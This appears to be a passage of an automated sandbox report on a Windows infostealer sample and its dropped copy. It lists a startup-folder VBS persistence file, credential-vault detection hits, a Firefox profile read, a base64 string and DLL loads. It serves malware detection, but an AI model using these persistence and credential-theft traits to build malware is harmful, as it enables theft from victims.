                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012A4A981_2_012A4A98
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012ADCA01_2_012ADCA0
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012A3E801_2_012A3E80
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_012A41C81_2_012A41C8
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_0696C2001_2_0696C200
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069656401_2_06965640
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069666681_2_06966668
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_06967DF01_2_06967DF0
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069631001_2_06963100
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069677101_2_06967710
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_0696E4181_2_0696E418
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069624091_2_06962409
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_069600401_2_06960040
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_06965D5F1_2_06965D5F
                      Source: C:\Users\user\Desktop\Ref#20203216.exeCode function: 1_2_0696001D1_2_0696001D
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_00EFE0A84_2_00EFE0A8
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_00EFE0984_2_00EFE098
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_00EF31F04_2_00EF31F0
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_00EF33804_2_00EF3380
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_0707EDA84_2_0707EDA8
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_0707E2604_2_0707E260
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_070600064_2_07060006
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 4_2_070600404_2_07060040
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_0112E2707_2_0112E270
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_01124A987_2_01124A98
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_0112AF8D7_2_0112AF8D
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_01123E807_2_01123E80
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_011241C87_2_011241C8
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A466687_2_06A46668
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A456407_2_06A45640
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A47DF07_2_06A47DF0
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A4B2A27_2_06A4B2A2
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A4C2007_2_06A4C200
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A431007_2_06A43100
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A477107_2_06A47710
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A424097_2_06A42409
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A4E4187_2_06A4E418
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A45D5F7_2_06A45D5F
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A400407_2_06A40040
                      Source: C:\Users\user\AppData\Roaming\iulue.exeCode function: 7_2_06A400257_2_06A40025
                      Source: Ref#20203216.exeStatic PE information: invalid certificate
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.0000000003149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000032E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000000.1692835291.0000000000E32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1777674923.0000000006A90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKuzgfndqd.dll" vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1755703275.000000000130E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1782387192.0000000006F10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000001.00000002.2953338512.0000000000D39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#20203216.exe
                      Source: Ref#20203216.exe, 00000001.00000002.2953533157.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#20203216.exe
                      Source: Ref#20203216.exeBinary or memory string: OriginalFilenameref.exe8 vs Ref#20203216.exe
                      Source: Ref#20203216.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Ref#20203216.exe.41014f0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.iulue.exe.3a2fd10.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 7.2.iulue.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.iulue.exe.3a2fd10.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#20203216.exe, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: Ref#20203216.exe, Ipkgt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: iulue.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: iulue.exe.0.dr, Ipkgt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, Ipkgt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Ref#20203216.exe, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: iulue.exe.0.dr, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs"
                      Source: Ref#20203216.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#20203216.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#20203216.exeVirustotal: Detection: 47%
                      Source: Ref#20203216.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\Desktop\Ref#20203216.exeFile read: C:\Users\user\Desktop\Ref#20203216.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\Desktop\Ref#20203216.exeProcess created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeProcess created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncryptsslp.dllJump to behavior
